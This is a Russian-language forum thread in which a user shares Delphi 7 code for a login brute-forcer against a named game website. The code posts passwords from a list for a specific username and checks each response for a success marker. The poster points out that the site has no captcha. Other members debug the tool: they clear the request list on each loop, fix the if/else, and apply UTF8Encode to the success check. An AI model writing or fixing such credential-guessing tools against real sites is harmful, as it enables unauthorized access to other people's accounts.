Привет всем решил я написать по видео гайду брут для игрового сайта в итоге в Delphi 7 все сохраняется(Колмпилируется) без ошибок я ставлю 2 пароля 1 валид другой не валид в итоге при бруте оба пароля становятся не валидными. Как это понять??
Вот коды брута в дельфи:
var
i:integer;
p,info:TstringList;
begin
p:=TstringList.Create;
info:=TstringList.Create;
for i:=0 to Memo1.Lines.Count -1 do
begin
info.Add('userid=Sereg122');
info.Add('userpass='+Memo1.Lines.Strings[i]);
p.Text:=IdHTTP1.Post('http://badline2.ru/index.php?s=login',info);
if pos('logout',p.Text)>0 then
begin
Memo2.Lines.Add(Memo1.Lines.Strings[i]+'IA?IEU IIAIOAE')
end
else
begin
Memo2.Lines.Add(Memo1.Lines.Strings[i]+'Ia?ieu ia iiaioae')
end
end;
end;
end.
Вот видео гайд откуда я делал все по шагам:
[Ссылки могут видеть только зарегистрированные пользователи. ]
Вот сайт игры: [Ссылки могут видеть только зарегистрированные пользователи. ] (Капчи нету)
Может я что-то неправильно написал прошу написать что не правильно буду очень благодарен!
Сделай так,а то добавление есть,а очищения нету стринга,и получается что каждый раз info заполняется,но не очищается.
Цитата:
for i:=0 to Memo1.Lines.Count -1 do
begin
info.clear;
info.Add('userid=Sereg122');
это:
Цитата:
begin
end
else
begin
Memo2.Lines.Add(Memo1.Lines.Strings[i]+'Ia?ieu ia iiaioae')
end
исправь на это:
Цитата:
else
Memo2.Lines.Add(Memo1.Lines.Strings[i]+'Ia?ieu ia iiaioae');
Последний раз редактировалось Relli; 15.11.2012 в 14:24.
РОСПОТРЕБНАДЗОР, Зачем мне емейл?? Если мне над именно по логину и паролю. И дело все в том что в коде который я написал есть ошибка или хз что и изза чегото даже валидный пароль становится не валидным.
А вообще,надо выучить основы,а не лезть писать авторизацию,не зная больше 70% кода(это мы знаем из твоего сообщения,где говорится,что ты не дружишь с исходником)
да я все делал по видео точ в точ и ниче не получилось, решил попросить помоши.
Добавлено через 15 минут
Цитата:
Сообщение от metraz
Не надо называть меня чуваком.
Тогда if pos('Панель Пользователя',p.Text)>0 then
Всеровно ниче не получается. А тут еще 1 такая "Сменая ситуация"
if pos('login',p.Text)>0 then если ставить так, то все пароли правильные какой не пиши.
Последний раз редактировалось Sereg16; 16.11.2012 в 16:04.
Причина: Добавлено сообщение
Советчики, блин. Это ж седьмая делфина, в ней всё русишское юникодовскими иероглифами пишется, естественно что надо или проверочную строку засунуть в юникод, или текст раскодировать.
Код:
if pos(UTF8Encode('Панель Пользователя'),p.Text)>0 then
Принимаются пожертвования любых размеров в фонд поддержки начинающих программистов Для просмотра ссылок или изображений в подписях, у Вас должно быть не менее 10 сообщение(ий). Сейчас у Вас 0 сообщение(ий).
Советчики, блин. Это ж седьмая делфина, в ней всё русишское юникодовскими иероглифами пишется, естественно что надо или проверочную строку засунуть в юникод, или текст раскодировать.
Код:
if pos(UTF8Encode('Панель Пользователя'),p.Text)>0 then
Я уж и забыл об этом)